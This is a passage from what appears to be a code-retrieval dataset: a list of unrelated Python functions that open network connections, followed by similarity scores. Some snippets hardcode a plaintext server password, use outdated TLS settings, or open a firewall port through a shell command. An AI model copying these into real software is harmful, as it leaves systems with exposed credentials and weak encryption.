COTPConnectionPacket().unpack(TPKTPacket().unpack(reply).data)\r\n\r\n self.NegotiatePDU()", "def Connection(self):\n try:\n system(\n f'netsh advfirewall firewall add rule name=\"Open Port {self.PORT}\" dir=in action=allow protocol=TCP localport={self.PORT} remoteip={self.HOST}')\n with socket() as s: # Create a socket object\n print('Server started!')\n print('Waiting for clients...')\n s.bind((self.HOST, self.PORT)) # Bind to the port\n s.listen(5) # Now wait for client connection.\n self.c, addr = s.accept() # Establish connection with client.\n # Remote client machine connection\n print('Got connection from', addr)\n except error as strerror:\n print(\"Network problems:\", strerror)\n return 0\n return 1", "def _establish_connection(self):\n self.conn = self.listener.accept()", "def connect(self):\n\n self.wm = telnetlib.Telnet(self.ip, self.port, self.timeout)\n time.sleep(2)\n print self.wm.read_very_eager() #clears connection message\n self.measure_chan()", "def connect_to_server(host, port) -> socket.SocketIO:\n # Create a TCP/IP socket\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n # Connect the socket to the port where the server is listening\n server_address = (host, port)\n print('[CLIENT LOG] connecting to {} port {}'.format(host,port)) \n sock.connect(server_address)\n return sock", "def __init__(self,\n host_name='127.0.0.1',\n port=ControlServer.CONTROL_PORT):\n\n self._socket = QtNetwork.QTcpSocket()\n self._socket.connected.connect(self._connected)\n self._socket.disconnected.connect(self._disconnected)\n self.connected = False\n self._socket.connectToHost(host_name, port)", "def __init__(self):\n # Create a TCP/IP socket\n self.client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)", "def start(self):\n if not self._connected:\n self._client.connect(self._addr, port=self._port, keepalive=60, bind_address=\"\")\n self._client.loop_start()\n self._connected = True\n logger.info(\"Connection with MQTT Broker at %s:%d estabilished.\", self._addr, self._port)", "def rhevConnect():\n rhev = rhev_settings.HOST_PORT\n conn = httplib.HTTPSConnection(rhev)\n return conn", "def enter_as_network_client(ai_settings,grid, screen, buttons,screen_status, button_status, card_database_filter, user,action, player2):\n host = user.ip_address\n port = 5555\n\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n s.connect((host,port))\n while 1:\n pass\n\n s.close()", "def connect_to_worker():\n socket = context.socket(zmq.REQ)\n socket.connect(\"tcp://localhost:5555\")\n return socket", "def start(self):\n\n address = (socket.gethostbyname(self.hostname), self.port)\n logger.info(\"Connecting to %r\" % (address,))\n self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self._socket.connect(address)\n self._start_processors()\n return self", "def connect(self):\n if not self._socket:\n self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self._socket.connect((self.host, self.port))\n self._socket.settimeout(0.0)", "def connect(self):\n self.class_logger.info(\"Performing connection to TRex server via HLT API\")\n self.check_res(self.hltapi.connect(device=self.host, port_list=self.ports, reset=True, break_locks=True))", "def __init__(self):\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.PORT = 2222\n # connect on construction,\n # use for duration of a game,\n # close connection on destruction later\n self.sock.connect((\"192.168.43.180\", self.PORT))", "def connect(self,ip,port):\n return 
self.network.connect(ip,port)", "def setup(self):\n self.ip = self.client_address[0]\n self.port = self.client_address[1]\n self.connection = self.request #TCP socket object for the client\n self.server.clients[(self.ip, self.port)] = self\n self.server.peers.append((self.connection)) \n for client in self.server.clients:\n print(\"Connected client: \", client)\n\n #for peer in self.server.peers:\n # print(\"Peers: \", peer)", "def connect_to_server(self):\n\n server=os.popen('hostname').read()\n if 'epfl.ch' not in server:\n conn = mds.Connection('tcvdata.epfl.ch')\n conn.openTree('tcv_shot', self.shot)\n self.tree = conn\n print(\"You are in server \"+server+\", so I'll open a connection\")\n else:\n self.tree = mds.Tree('tcv_shot', self.shot)", "def run(self):\n HOST = 'localhost' # Symbolic name meaning all available interfaces\n PORT = 54123 # Arbitrary non-privileged port\n \n \n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.bind((HOST, PORT))\n while(self.running):\n s.listen(1)\n conn, addr = s.accept()\n self.listen_to_connection(conn)\n conn.close()\n s.close()", "def connect(self, cmd, window, **kwargs):\n try:\n kwargs['server']\n except KeyError:\n window.server_event('/%s syntax: /%s servername [port] [nickname]' % cmd)\n return\n try:\n kwargs['port']\n try: \n int(kwargs['port'])\n except ValueError:\n raise KeyError\n except KeyError:\n kwargs['port'] = 6667\n try:\n kwargs['nickname']\n except KeyError:\n kwargs['nickname'] = \"circe\"\n self.connection.connect(**kwargs)", "def __init__(self, ip_address=\"127.0.0.1\", port=8777, network_timeout=120):\n self._tcp_client = TCPClient(ip_address, port, network_timeout)\n self._tcp_client.connect()\n self._tcp_lock = threading.Lock()", "def _connect(self):\n #print(\"Connecting...\")\n self._connection = reactor.connectTCP(self.host, self.port, self.factory) #@UndefinedVariable", "def connect(self):\n self.sock.connect((self.host, self.port))\n self.sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)\n logger.debug(\"TCPSPP: Connected to %s:%d\", self.host, self.port)", "def __connect():\n # Create socket\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n # Connect socket to server\n sock.connect((SERVER_IP, SERVER_PORT))\n\n # Return connected socket\n return sock", "def connect(self, host, port=6667):\n\t\tprint(host)\n\t\tprint(port)\n\t\tsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)\n\t\tself.s = ssl.wrap_socket(sock)\n\t\tself.s.connect((host, port))", "def init_conn(self):\n \n SERVER_ADDRESS = '192.168.0.21'\n PORT = 8018\n SERVER_PASSWORD = \"biratkingofcomedy\" \n connected = False\n \n # check if test module is being run\n if self.testing == 'n': \n while not connected:\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n \n try:\n self.socket.connect((SERVER_ADDRESS, PORT))\n \n # server verification\n self.socket.sendall(self.make_packet(\"DATA\", SERVER_PASSWORD))\n \n response = self.socket.recv(4096)\n \n if response:\n response_hdr, response_msg, response_sdr = self.parse_packet(response)\n \n if response_hdr == \"ERROR\" and response_msg == \"IDENTIFY FAILED\":\n raise Exception(\"PASSWORD FAIL\")\n \n elif response_hdr == \"DATA\" and response_msg == \"CONNECTED\":\n connected = True\n \n else:\n raise Exception(\"CONNECTION FAIL\") \n \n except Exception as e:\n if e == \"PASSWORD FAIL\":\n print(\"DEBUG: server connection failed (invalid credentials)\")\n print(\"DEBUG: quitting\")\n break\n \n else:\n print(e)\n print(\"DEBUG: server 
connection failed (could not connect), trying again in 10s\")\n time.sleep(10)\n \n else:\n print(\"DEBUG: socket setup skipped\")", "def connect(self):\n if not self._connected:\n try:\n self.socket.connect((self.data[\"addr\"], self.data[\"port\"]))\n if self.data.get(\"tls\"):\n self.cert = self.socket.getpeercert()\n except OSError as err:\n _LOGGER.exception(\n \"PyISY could not connect to ISY event stream. %s\", err\n )\n if self._on_lost_function is not None:\n self._on_lost_function()\n return False\n self.socket.setblocking(0)\n self._writer = self.socket.makefile(\"w\")\n self._connected = True\n self.isy.connection_events.notify(ES_CONNECTED)\n return True\n return True", "def connect(self, connID, addr):\r\n return self.callRemote('connect', connID, addr)", "def connect():\n logging.info('Client connected')", "def createConnectionToCli(self):\n connected = False\n # loop until connected\n while not connected:\n try:\n self.dataClient = Client(\n ('localhost', 5000), authkey=b'secret password')\n connected = True\n except ConnectionRefusedError:\n pass\n\n self.logger.debug('Connected to Process!')", "def open(self):\n self._server = socketserver.ThreadingTCPServer(\n server_address=('localhost', self._requested_local_port),\n RequestHandlerClass=self._create_handler(self._ssh_client, self._remote_host, self._remote_port),\n )\n\n threading.Thread(target=self.serve_forever).start()\n\n print('Forwarding local port {} to remote {}:{}'.format(self.local_port, self.remote_host, self.remote_port))", "def openCircuit(srv):", "def open_socket(port, on_data, on_quit = None):\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.bind((HOST, port))\n s.listen()\n try:\n while True:\n conn, addr = s.accept()\n while True:\n data_enc = conn.recv(BUFFER_SIZE)\n if not data_enc:\n break\n # Decode the data\n data_dec = data_enc.decode('utf-8')\n conn.sendall(on_data(data_dec).encode())\n except:\n if on_quit:\n on_quit()", "def _connect(self):\n\n # Get the timeout\n m_timeout = OMPv4.TIMEOUT\n if self.__timeout:\n m_timeout = self.__timeout\n\n # Connect to the server\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.settimeout(m_timeout)\n try:\n sock.connect((self.__host, int(self.__port)))\n except socket.error, e:\n raise ServerError(str(e))\n self.socket = ssl.wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLSv1)\n\n # Authenticate to the server\n self._authenticate(self.__username, self.__password)", "def connect(self):\n try:\n self._send = 0\n self.socket = socket.socket(socket.AF_INET,\n socket.SOCK_STREAM,\n socket.getprotobyname('tcp'))\n self.socket.connect((self.host, self.port))\n self.socket.recv(self.packet_size)\n except socket.error:\n raise ConnectionError(\n 'Cannot connect to server at %s' % self.name)", "def open(self):\n self.device = ConnectHandler(\n device_type='vyos',\n host=self.hostname,\n username=self.username,\n password=self.password,\n timeout=self.timeout,\n port=self.port\n )", "def run(self):\n\t\t\n\t\tself.connect(self.config[\"server\"])", "def conectar(self):\r\n self.socket = socket.create_connection((self.host, self.puerto))", "def _connect(self):\n try:\n #print(\"try to connect _connect\")\n sock = gevent.socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.connect(self.remote_address)\n except socket.error as error:\n logger.warning(\"Couldn't connect to %s: %s.\",\n self._repr_remote(), error)\n else:\n self.initialize(sock, self.remote_service_coord)", "def connect(self):\n assert self.listening\n assert not 
self.connected\n ctx = zmq.Context.instance()\n port = NODE_INFOS[self.ID].port\n self._send_socket = ctx.socket(zmq.PUB)\n self._send_socket.bind(f\"tcp://*:{port}\")\n self.connected = True", "def connect(self,ip,port):\n import time\n import socket\n\n try:\n self.socket_reference.connect((ip, port))\n except socket.error:\n self.close()\n reload(socket)\n raise CommClientException(\"Cannot connect to \" + ip + \":\" + str(port))", "def startTwoWayTCP():\r\n print(\"=================================\\n\")\r\n print(\" starting TCP test\")\r\n print(\"\\n=================================\")\r\n os.system(\"iperf3.exe -s -B 11.0.0.50 --logfile Server1.txt\")\r\n os.system(\"iperf3.exe -s -B 11.0.0.51 --logfile Server2.txt\")\r\n os.system(\"iperf3.exe -c 11.0.0.50 -b 0 -B 11.0.0.51 -t 0 -V --logfile Client1.txt\")\r\n os.system(\"iperf3.exe -c 11.0.0.51 -b 0 -B 11.0.0.50 -t 0 -V --logfile Client2.txt\")\r\n time.sleep(0.5)\r\n return isTCPRunning()", "def connect(self, host, port=6667, use_ssl=False):\n self.log('@ Connecting to %s port %d' % (host, port))\n\n self.sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n self.sk.connect((host, port))\n self.log('@ Connected')\n self.connected = True\n self.heartbeat.start()\n self._callback('on_connected')", "def init_tcp_conn(target: str, port: int) -> socket.socket:\n conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n conn.settimeout(5)\n try:\n conn.connect((target, port))\n return conn\n except socket.timeout as e:\n print(e)\n return None", "def connect(self):\n # Standard implementation from HTTPSConnection, which is not\n # designed for extension, unfortunately\n sock = socket.create_connection((self.host, self.port),\n self.timeout, self.source_address)\n if getattr(self, '_tunnel_host', None):\n self.sock = sock\n self._tunnel()\n\n # This is the only difference; default wrap_socket uses SSLv23\n self.sock = ssl.wrap_socket(sock, self.key_file, self.cert_file, ssl_version=ssl.PROTOCOL_TLSv1_2)", "def connect(self):\n\t\tself._entity_server_connection.attempt_connection()", "def admin_client():\n host = '127.0.0.1'\n port = 8126\n return TcpClient(host, port)", "def connect(self):\n self.socket.connect(f'tcp://{self.ip}:{self.port}')\n self.socket.send_string('PUB_PORT')\n self.pub_port = self.socket.recv_string()\n self.pub_socket = zmq.Socket(self.ctx, zmq.PUB)\n self.pub_socket.connect(f\"tcp://{self.ip}:{self.pub_port}\")", "def open(self):\n broker = os.path.join(getsitepackages()[0], 'pynq_networking', 'rsmb',\n 'rsmb', 'src', 'broker_mqtts')\n\n self.close()\n os.system(f\"nohup {broker} > {self.log} &\")\n\n for t in MQTT_PACKET_TYPES:\n bind_layers(MQTT, t, {'type': t.type})\n\n bind_layers(TCP, MQTT_Stream, {'dport': self.mqtt_port})\n bind_layers(TCP, MQTT_Stream, {'sport': self.mqtt_port})\n\n for t in MQTTSN_PACKET_TYPES:\n bind_layers(MQTTSN, t, {'type': t.type})\n\n bind_layers(UDP, MQTTSN, {'dport': self.mqttsn_port})\n bind_layers(UDP, MQTTSN, {'sport': self.mqttsn_port})", "def connect(self):\n self.snmp_client = SNMPClient(host=self.host,\n read_community=self.read_community,\n write_community=self.write_community,\n port=self.port,\n version=self.version,\n log=self.log)", "def connect_to_ibkr(self):\n\n self.update_console(\"Reporting connection to the server...\")\n print(\"Reporting connection to the server...\")\n result = report_login_to_server(self.settings)\n self.update_console(result)\n connector = Worker(self.ibkrworker.prepare_and_connect)\n 
connector.signals.result.connect(self.connection_done)\n connector.signals.status.connect(self.update_status)\n connector.signals.notification.connect(self.update_console)\n # Execute\n self.threadpool.start(connector)", "def mxt_connect(self):\n self._mxt_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self._mxt_sock.connect((self._host, 10000))", "def _lowLevelOpen(self):\n import socket\n self.socket_reference = socket.socket(socket.AF_INET, socket.SOCK_STREAM)", "def connection_init(self, port, ip):\n\t\t# Инициализация сокета и сообщение серверу о нашем появлении\n\t\tself.transport = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\t\t\n\t\t# Таймаут необходим для освобождения сокета.\n\t\tself.transport.settimeout(5)\n\t\t\n\t\t# Соединяемся, 5 попыток соединения, флаг успеха ставим в True если\n\t\t# удалось\n\t\tconnected = False\n\t\tfor i in range(5):\n\t\t\tclient_log.info(f'Попытка подключения №{i + 1}')\n\t\t\ttry:\n\t\t\t\tself.transport.connect((ip, port))\n\t\t\texcept (OSError, ConnectionRefusedError):\n\t\t\t\tpass\n\t\t\telse:\n\t\t\t\tconnected = True\n\t\t\t\tclient_log.debug(\"Connection established.\")\n\t\t\t\tbreak\n\t\t\ttime.sleep(1)\n\t\t\n\t\t# Если соединится не удалось - исключение\n\t\tif not connected:\n\t\t\tclient_log.critical('Не удалось установить соединение с сервером')\n\t\t\traise ServerError('Не удалось установить соединение с сервером')\n\t\t\n\t\tclient_log.debug('Starting auth dialog.')\n\t\t\n\t\t# Запускаем процедуру авторизации\n\t\t# Получаем хэш пароля\n\t\tpasswd_bytes = self.password.encode('utf-8')\n\t\tsalt = self.username.lower().encode('utf-8')\n\t\tpasswd_hash = hashlib.pbkdf2_hmac('sha512', passwd_bytes, salt, 10000)\n\t\tpasswd_hash_string = binascii.hexlify(passwd_hash)\n\t\t\n\t\tclient_log.debug(f'Passwd hash ready: {passwd_hash_string}')\n\t\t\n\t\t# Получаем публичный ключ и декодируем его из байтов\n\t\tpubkey = self.keys.publickey().export_key().decode('ascii')\n\t\t\n\t\t# Авторизируемся на сервере\n\t\twith socket_lock:\n\t\t\tpresense = {\n\t\t\t\tACTION: PRESENCE,\n\t\t\t\tTIME: time.time(),\n\t\t\t\tUSER: {\n\t\t\t\t\tACCOUNT_NAME: self.username,\n\t\t\t\t\tPUBLIC_KEY: pubkey\n\t\t\t\t}\n\t\t\t}\n\t\t\tclient_log.debug(f\"Presense message = {presense}\")\n\t\t\t# Отправляем серверу приветственное сообщение.\n\t\t\ttry:\n\t\t\t\tsend_message(self.transport, presense)\n\t\t\t\tans = get_message(self.transport)\n\t\t\t\tclient_log.debug(f'Server response = {ans}.')\n\t\t\t\t# Если сервер вернул ошибку, бросаем исключение.\n\t\t\t\tif RESPONSE in ans:\n\t\t\t\t\tif ans[RESPONSE] == 400:\n\t\t\t\t\t\traise ServerError(ans[ERROR])\n\t\t\t\t\telif ans[RESPONSE] == 511:\n\t\t\t\t\t\t# Если всё нормально, то продолжаем процедуру\n\t\t\t\t\t\t# авторизации.\n\t\t\t\t\t\tans_data = ans[DATA]\n\t\t\t\t\t\thash = hmac.new(passwd_hash_string, ans_data.encode('utf-8'), 'MD5')\n\t\t\t\t\t\tdigest = hash.digest()\n\t\t\t\t\t\tmy_ans = RESPONSE_511\n\t\t\t\t\t\tmy_ans[DATA] = binascii.b2a_base64(\n\t\t\t\t\t\t\tdigest).decode('ascii')\n\t\t\t\t\t\tsend_message(self.transport, my_ans)\n\t\t\t\t\t\tself.process_server_ans(get_message(self.transport))\n\t\t\texcept (OSError, json.JSONDecodeError) as err:\n\t\t\t\tclient_log.debug(f'Connection error.', exc_info=err)\n\t\t\t\traise ServerError('Сбой соединения в процессе авторизации.')", "def connect(self):\n \n try:\n self.__sock.connect((self.__host, self.__port))\n\n except socket.error,e:\n print 'Oops, unable to connect. 
Try again!',e\n sys.exit(1)", "def start_socket(ip, port):\n try:\n # initiate socket\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n # connect to server\n print(\"socket connected at ip {} and port {}\".format(ip, port))\n sock.connect((ip, port))\n return sock\n except Exception as e:\n print(\"Error start_socket\", e)\n #exit()", "def __init__(self, hostname, debugOut=None, noProto=False, connectNow=True, portNumber=4403):\n\n logging.debug(f\"Connecting to {hostname}\")\n\n server_address = (hostname, portNumber)\n sock = socket.create_connection(server_address)\n\n # Instead of wrapping as a stream, we use the native socket API\n # self.stream = sock.makefile('rw')\n self.stream = None\n self.socket = sock\n\n StreamInterface.__init__(\n self, debugOut=debugOut, noProto=noProto, connectNow=connectNow)", "def start_tcp_server(server_info: ServerInfo, lock: Lock) -> None:\n lock.acquire() # this lock means that socket is still creating\n sock: socket.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sock.bind(('127.0.0.1', 0)) # bind to a random free port\n sock.listen(1)\n server_info.port = sock.getsockname()[1] # save the number of the server port\n lock.release() # the socket is created\n _ = sock.accept() # blocks here until a connection from a client\n server_info.connection_established = True\n sock.close()", "def open_tcp(self, url):\n assert self._socket is None, 'The connection has already been established'\n\n logger.debug('Opening a tcp msgpackrpc connection')\n self._socket = socket.create_connection((url.hostname, url.port))\n\n # set TCP NODELAY\n if self._tcp_no_delay:\n self._socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)\n\n if self._timeout:\n self._socket.settimeout(self._timeout)" ]
[ "0.62255913", "0.62050253", "0.6195879", "0.6171926", "0.6135462", "0.6120585", "0.606939", "0.60673463", "0.602371", "0.6017615", "0.60021055", "0.60011834", "0.5976623", "0.5967753", "0.5963107", "0.59526026", "0.59498817", "0.5947324", "0.5940068", "0.5910819", "0.59102845", "0.5908937", "0.5888914", "0.5888275", "0.5881181", "0.5865311", "0.5864343", "0.5863684", "0.58565176", "0.58555764", "0.58541733", "0.5850206", "0.58318573", "0.5818854", "0.5818822", "0.5812058", "0.58058214", "0.5803451", "0.5789198", "0.5789198", "0.57809496", "0.5779891", "0.57734543", "0.57625383", "0.57586586", "0.5736914", "0.5734025", "0.57334524", "0.5725897", "0.5705459", "0.5701855", "0.5695122", "0.5694719", "0.5694133", "0.5687389", "0.56836444", "0.56706226", "0.56553346", "0.56507635", "0.5645613", "0.564472", "0.56447196", "0.5635904", "0.56333834", "0.563298", "0.562174", "0.5614954", "0.56119174", "0.55932266", "0.5592886", "0.5590318", "0.5577666", "0.55763644", "0.55738795", "0.55729413", "0.55674857", "0.5562373", "0.55618954", "0.5561572", "0.5555004", "0.5553721", "0.5550618", "0.5544552", "0.5538928", "0.55331653", "0.55302584", "0.5529091", "0.55213916", "0.551844", "0.5517037", "0.550121", "0.54923254", "0.54868203", "0.5486626", "0.548428", "0.547646", "0.54739517", "0.5463272", "0.545411", "0.54534906" ]
0.68877107
0
Connection routine for the CCD (given below in the ccd variable). The following CCD properties are accessed; more can be found at indilib.org.

    CONNECTION          Switch
    CCD_EXPOSURE        Number
    CCD1                BLOB
    CCD_BINNING         Number
    CCD_ABORT_EXPOSURE  Switch
    CCD_TEMPERATURE     Number
    CCD_COOLER          Switch
    CCD_FRAME_TYPE      Switch
def connect_to_ccd():
    ccd="SX CCD SXVR-H694"
    device_ccd=indiclient.getDevice(ccd)
    while not(device_ccd):
        time.sleep(0.5)
        device_ccd=indiclient.getDevice(ccd)
        print("Searching for device...")
    print("Found device")

    ccd_connect=device_ccd.getSwitch("CONNECTION")
    while not(ccd_connect):
        time.sleep(0.5)
        ccd_connect=device_ccd.getSwitch("CONNECTION")
    if not(device_ccd.isConnected()):
        ccd_connect[0].s=PyIndi.ISS_ON   # the "CONNECT" switch
        ccd_connect[1].s=PyIndi.ISS_OFF  # the "DISCONNECT" switch
        indiclient.sendNewSwitch(ccd_connect)

    ccd_exposure=device_ccd.getNumber("CCD_EXPOSURE")
    while not(ccd_exposure):
        time.sleep(0.5)
        ccd_exposure=device_ccd.getNumber("CCD_EXPOSURE")

    # inform the indi server that we want to receive the
    # "CCD1" blob from this device
    indiclient.setBLOBMode(PyIndi.B_ALSO, ccd, "CCD1")
    ccd_ccd1=device_ccd.getBLOB("CCD1")
    while not(ccd_ccd1):
        time.sleep(0.5)
        ccd_ccd1=device_ccd.getBLOB("CCD1")

    # get access to setting the CCD's binning value
    ccd_bin=device_ccd.getNumber("CCD_BINNING")
    while not(ccd_bin):
        time.sleep(0.5)
        ccd_bin=device_ccd.getNumber("CCD_BINNING")

    # get access to aborting the CCD's exposure
    ccd_abort=device_ccd.getSwitch("CCD_ABORT_EXPOSURE")
    while not(ccd_abort):
        time.sleep(0.5)
        ccd_abort=device_ccd.getSwitch("CCD_ABORT_EXPOSURE")

    # get access to the CCD's temperature value
    ccd_temp=device_ccd.getNumber("CCD_TEMPERATURE")
    while not(ccd_temp):
        time.sleep(0.5)
        ccd_temp=device_ccd.getNumber("CCD_TEMPERATURE")

    # get access to switching the CCD's cooler on/off
    ccd_cooler=device_ccd.getSwitch("CCD_COOLER")
    while not(ccd_cooler):
        time.sleep(0.5)
        ccd_cooler=device_ccd.getSwitch("CCD_COOLER")

    # get access to switching the CCD's image frame type
    ccd_frame=device_ccd.getSwitch("CCD_FRAME_TYPE")
    while not(ccd_frame):
        time.sleep(0.5)
        ccd_frame=device_ccd.getSwitch("CCD_FRAME_TYPE")

    return ccd_exposure, ccd_ccd1, ccd_bin, ccd_abort, ccd_temp, ccd_cooler, ccd_frame
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def open_circ():\n\n set_mode(mode_cc) # set operation mode to CC\n time.sleep(.250)\n set_CC_current(cc_current=0) # set CC mode current to 0 amps\n time.sleep(.1)\n \n oc_vals = get_input_values() # read open circuits levels\n oc_data_point = data_point(oc_vals) # create data point for open circuit measurement\n voc = oc_data_point[3] # open circuit voltage measurement\n print('Open circuit voltage: ', voc)\n write_data_tofile(oc_data_point) # write data to file\n \n return voc", "def ccd(self):\n self.spectrum = self.spectrum", "def setCcdMode(*argv):", "def openCircuit(srv):", "def exposure(frameType, expTime):\n\n blobEvent.clear() \n\n # set the specified frame type\n if frameType.lower() == 'light':\n ccd_frame[0].s = PyIndi.ISS_ON\n ccd_frame[1].s = PyIndi.ISS_OFF\n ccd_frame[2].s = PyIndi.ISS_OFF\n ccd_frame[3].s = PyIndi.ISS_OFF \n indiclient.sendNewSwitch(ccd_frame)\n elif frameType.lower() == 'bias':\n ccd_frame[0].s = PyIndi.ISS_OFF\n ccd_frame[1].s = PyIndi.ISS_ON\n ccd_frame[2].s = PyIndi.ISS_OFF\n ccd_frame[3].s = PyIndi.ISS_OFF \n indiclient.sendNewSwitch(ccd_frame)\n elif frameType.lower() == 'dark':\n ccd_frame[0].s = PyIndi.ISS_OFF\n ccd_frame[1].s = PyIndi.ISS_OFF\n ccd_frame[2].s = PyIndi.ISS_ON\n ccd_frame[3].s = PyIndi.ISS_OFF \n indiclient.sendNewSwitch(ccd_frame)\n elif frameType.lower() == 'flat':\n ccd_frame[0].s = PyIndi.ISS_OFF\n ccd_frame[1].s = PyIndi.ISS_OFF\n ccd_frame[2].s = PyIndi.ISS_OFF\n ccd_frame[3].s = PyIndi.ISS_ON \n indiclient.sendNewSwitch(ccd_frame)\n\n # set the value for the next exposure\n ccd_exposure[0].value=expTime\n\n indiclient.sendNewNumber(ccd_exposure)\n\n # wait for the exposure\n blobEvent.wait()\n\n for blob in ccd_ccd1:\n # pyindi-client adds a getblobdata() method to IBLOB item\n # for accessing the contents of the blob, which is a bytearray in Python\n image_data=blob.getblobdata()\n\n # write the byte array out to a FITS file\n global imgNum\n global imgName\n imgNum += 1\n fileName = fileDir+'raw-'+str(imgNum).zfill(8)+'.fits'\n f = open(fileName, 'wb')\n f.write(image_data)\n f.close()\n imgName = fileName\n \n return fileName", "def getConc(fileID, spc):\r\n\r\n dataKey = rmn.fstinf(fileID, nomvar=spc, ip1=ip1)['key']\r\n dataRec = rmn.fstluk(dataKey)\r\n concData = dataRec['d']\r\n return concData, dataKey, dataRec", "def connect(self):\n self.vgc = Pfeiffer_VGC_Interface(port=self.settings.port.val, debug=self.settings['debug_mode'])\n\n self.settings.ch1_pressure.connect_to_hardware(read_func=getattr(self,'read_ch1_pressure'))\n \n self.settings.ch1_sensor_type.connect_to_hardware(read_func=getattr(self, 'read_ch1_sensor_type'))\n \n self.settings.ch2_pressure.connect_to_hardware(read_func=getattr(self,'read_ch2_pressure'))\n \n self.settings.ch2_sensor_type.connect_to_hardware(read_func=getattr(self, 'read_ch2_sensor_type'))\n \n self.settings.ch3_pressure.connect_to_hardware(read_func=getattr(self, 'read_ch3_pressure'))\n \n self.settings.ch3_sensor_type.connect_to_hardware(read_func=getattr(self, 'read_ch3_sensor_type'))\n \n self.settings.ch1_sensor_type.read_from_hardware()\n self.settings.ch2_sensor_type.read_from_hardware()\n self.settings.ch3_sensor_type.read_from_hardware()", "def short_circ():\n \n set_mode(mode_cv)\n time.sleep(.250)\n set_CV_volts(0.1)\n time.sleep(.250)\n \n sc_vals = get_input_values()\n sc_data_point = data_point(sc_vals)\n jsc = sc_data_point[4]\n print('Short circuit current: ', jsc)\n write_data_tofile(sc_data_point)\n\n return jsc", "def cdi(self):\n from infapy.cdi import CDI\n 
infapy.log.info(\"Created the cdi object to access the iics cdi apis\")\n return CDI(self._v3,self._v2,self._v2BaseURL,self._v3BaseURL,self._v3SessionID,self._v2icSessionID)", "async def _raw_cdc_data(self) -> Dict[str, Any]:\n data = await self._request(\"get\", \"map/cdc\")\n return cast(Dict[str, Any], data)", "def _read_cardiochip(self):\n cur_leadstatus = 0\n sample_count =0\n while self.connected:\n sample_count+=1\n #check for sync bytes\n readbyte = ord(self.ser.read(1))\n #print readbyte, SYNC_BYTE\n if readbyte != SYNC_BYTE:\n continue\n readbyte = ord(self.ser.read(1))\n if readbyte != SYNC_BYTE:\n continue\n\n #parse length byte\n while True:\n pLength = ord(self.ser.read(1))\n if pLength != SYNC_BYTE:\n break\n if pLength > 169:\n continue\n #print \"L: %i\" % pLength\n\n # collect payload bytes\n payload = self.ser.read(pLength)\n payload = [ord(x) for x in payload] #convert to int from string\n #print \"payload: \" + str(payload).strip('[]')\n # ones complement inverse of 8-bit payload sum\n checksum = sum(payload) & 0xFF\n checksum = ~checksum & 0xFF\n\n # catch and verify checksum byte\n chk = ord(self.ser.read(1))\n #print \"chk: \" + str(checksum)\n if chk != checksum:\n print \"checksum error, %i != %i\" % (chk, checksum)\n continue\n\n output = self._parseData(payload)\n\n lead_status = next(( d for d in output if 'leadoff' in d), None)\n if lead_status is not None:\n if cur_leadstatus != lead_status['leadoff']:\n #we have a change\n if lead_status['leadoff']==200:\n print \"LEAD ON\"\n elif lead_status['leadoff']==0:\n print \"LEAD OFF\"\n cur_leadstatus = lead_status['leadoff']\n\n # store the output data in a queue\n # first, create a tuple with the sample index and dict with the timestamp and ecg\n ecgdict = next(((i,d) for i,d in enumerate(output) if 'ecg_raw' in d), None)\n if ecgdict is not None and sample_count>self.Fs*2:\n #let's just ignore the first 2 seconds of crappy data\n ecgdict[1]['leadoff'] = cur_leadstatus\n #print ecgdict[1]\n self.ecg_buffer.put(ecgdict[1]) # this should save the ecg and timestamp keys\n\n return", "def main() :\n #fname = '/reg/d/psdm/CXI/cxi35711/hdf5/cxi35711-r0009.h5'\n #dsname = '/Configure:0000/Run:0000/CalibCycle:0000/CsPad::ElementV2/CxiDs1.0:Cspad.0/data'\n #event = 1\n\n fname = '/reg/d/psdm/CXI/cxi37411/hdf5/cxi37411-r0039.h5'\n dsname = '/Configure:0000/Run:0000/CalibCycle:0000/CsPad::ElementV2/CxiDsd.0:Cspad.0/data'\n event = 1\n\n print 'Default CSPad configuration pars:'\n cspadconfig.printCSPadConfigPars()\n\n print '\\nCSPad configuration pars: for fname, dsname, event =\\n', fname, '\\n', dsname, '\\n', event\n cspadconfig.setCSPadConfiguration( fname, dsname, event ) # This will set current CSPad configuration\n cspadconfig.printCSPadConfigPars()", "def CCDpowerup(self):\n #starting drain voltages on CABAC\n drains = {\"OD\": 29, \"GD\": 24, \"RD\": 18}\n self.send_cabac_config(drains)\n\n time.sleep(1)\n\n #starting OG voltage on CABAC\n og = {\"OG\": 3.5}\n self.send_cabac_config(og)\n\n time.sleep(1)\n\n #sets clock rails\n dacs = {\"V_SL\": 0, \"V_SH\": 8.03, \"V_RGL\": 0, \"V_RGH\": 8.03, \"V_PL\": 0, \"V_PH\": 9.13}\n self.fpga.set_clock_voltages(dacs)\n\n time.sleep(1)\n\n #sets clock currents on CABAC\n iclock = {\"IC\": 255}\n self.send_cabac_config(iclock)\n\n time.sleep(1)\n\n #puts current on CS gate\n for stripe in self.stripes:\n self.fpga.set_current_source(0xfff, stripe)\n\n #rewrite default state of sequencer (to avoid reloading functions)\n 